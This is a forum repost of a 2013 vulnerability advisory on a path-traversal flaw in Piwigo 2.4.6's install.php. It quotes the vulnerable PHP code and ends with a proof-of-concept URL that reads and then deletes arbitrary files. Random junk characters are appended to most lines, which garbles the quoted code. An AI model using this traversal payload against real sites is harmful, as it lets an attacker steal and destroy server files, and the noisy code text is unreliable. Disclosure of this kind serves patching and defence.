中国网络渗透测试联盟

标题: Piwigo任意文件泄露和任意文件删除漏洞 [打印本页]
作者: admin    时间: 2013-3-14 20:15
标题: Piwigo任意文件泄露和任意文件删除漏洞
Piwigo是用PHP编写的相册脚本。& O$ E- N. b4 B- W; ]
7 ]: j- [* F% q9 W
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。- Q+ Z, N7 P0 u; v
====================================================================
" s  v) g' |7 Y" @5 q4 `/install.php:
8 t! g6 R7 k! y& n& D0 G3 V3 f4 W! }-------------
. l6 o( ~! T; v: @! t5 W, ~113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
5 _. d& g8 w% D& f4 |+ h114: {
' Y, y- v5 r" \/ n! h' |1 l# O( m! ?- K115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];8 S8 B2 a$ ?! h; T
116:   header('Cache-Control: no-cache, must-revalidate');
1 n& f0 e8 u8 ]1 W# E+ ]4 R9 u117:   header('Pragma: no-cache');/ N2 b' x# @1 _' Z7 D) A3 l
118:   header('Content-Disposition: attachment; filename="database.inc.php"');1 |  x" H# n+ h) Y4 Y5 C
119:   header('Content-Transfer-Encoding: binary');
2 u/ ?& Z  N7 r; B. s120:   header('Content-Length: '.filesize($filename));
8 p& I4 X* J$ Q8 Q7 ]121:   echo file_get_contents($filename);
3 j1 m4 u+ s4 t0 X122:   unlink($filename);, v3 Z/ N' ^/ w9 _( a' ]# c% O
123:   exit();
+ l4 y( w5 B& F- _9 S+ S5 m124: }1 n: k' }, Y0 R2 p6 B7 s
====================================================================
$ O; V) }3 Y5 U6 k8 a9 ]/ o1 b9 t2 n. l $ x3 u, Q; L8 Z
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
9 `$ D+ X3 I. h/ `           Apache 2.4.2 (Win32)' N# ^! M5 y% f2 J6 }) B
           PHP 5.4.4
$ T+ ]" c! u* H) z( B) k           MySQL 5.5.25a
6 U. W7 z5 D+ V9 F3 m
% e# @4 }! d+ Q1 VVulnerability discovered by Gjoko 'LiquidWorm' Krstic; M6 f& F. _! e9 D9 w" Z' v( c3 ~
                            @zeroscience
8 C; C8 C' [. N9 F
6 u9 U7 R( X; x* ]7 {8 W2 _2 e5 LAdvisory ID: ZSL-2013-5127
; J6 v1 T8 w' N4 Y7 A' F" q% AAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php  |5 v0 y0 f) ~- v  B* k  K4 b
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
" p$ z( h% ]  @) T! @ 9 m! ]$ f" L- ], q
15.02.2013) R6 R9 X! Y" c0 D
  j5 g$ z" c% q; j% Y
--
7 P3 O+ \2 D/ c$ D; H' K$ jhttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
5 ?' M  \, S! D& _ ' z: O2 l2 B& g2 P6 P) p/ b




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2